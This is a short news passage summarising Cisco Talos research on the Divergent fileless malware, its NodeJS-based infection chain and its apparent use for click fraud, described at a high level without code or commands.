Divergent uses existing programs to achieve its malicious goals, such as those already present in Windows or downloaded from third parties.
"This threat uses NodeJS — a program that executes JavaScript outside of a web browser — as well as the legitimate open-source utility WinDivert to facilitate some of the functionality in the Divergent malware," said Talos.
Talos added that the use of NodeJS is not something commonly seen across malware families, which makes Divergent an interesting development.
However, it shares many similarities with other popular fileless malware families, including Kovter.
How it works
"When first delivered and executed on a victim's machine, the malware is in the portable executable (PE) format. Its first task, however, is to install itself to the system in a less suspicious form, namely as an HTML Application (HTA) that will load the malware from the registry," said Talos.
Once installed, a series of events occur:
The initial JavaScript file downloads a second JavaScript file.
This second JavaScript file runs a PowerShell command which downloads several malicious tools
These tools include the ability to disable Windows Defender, attain more control of the PC, and create a proxy.
Talos believes that the malware was designed for typical cybercrime rather than for government-sanctioned attacks.
It added that Divergent was probably designed to be used predominantly for click fraud, using the computers of everyday European and US consumers to increase ad revenue.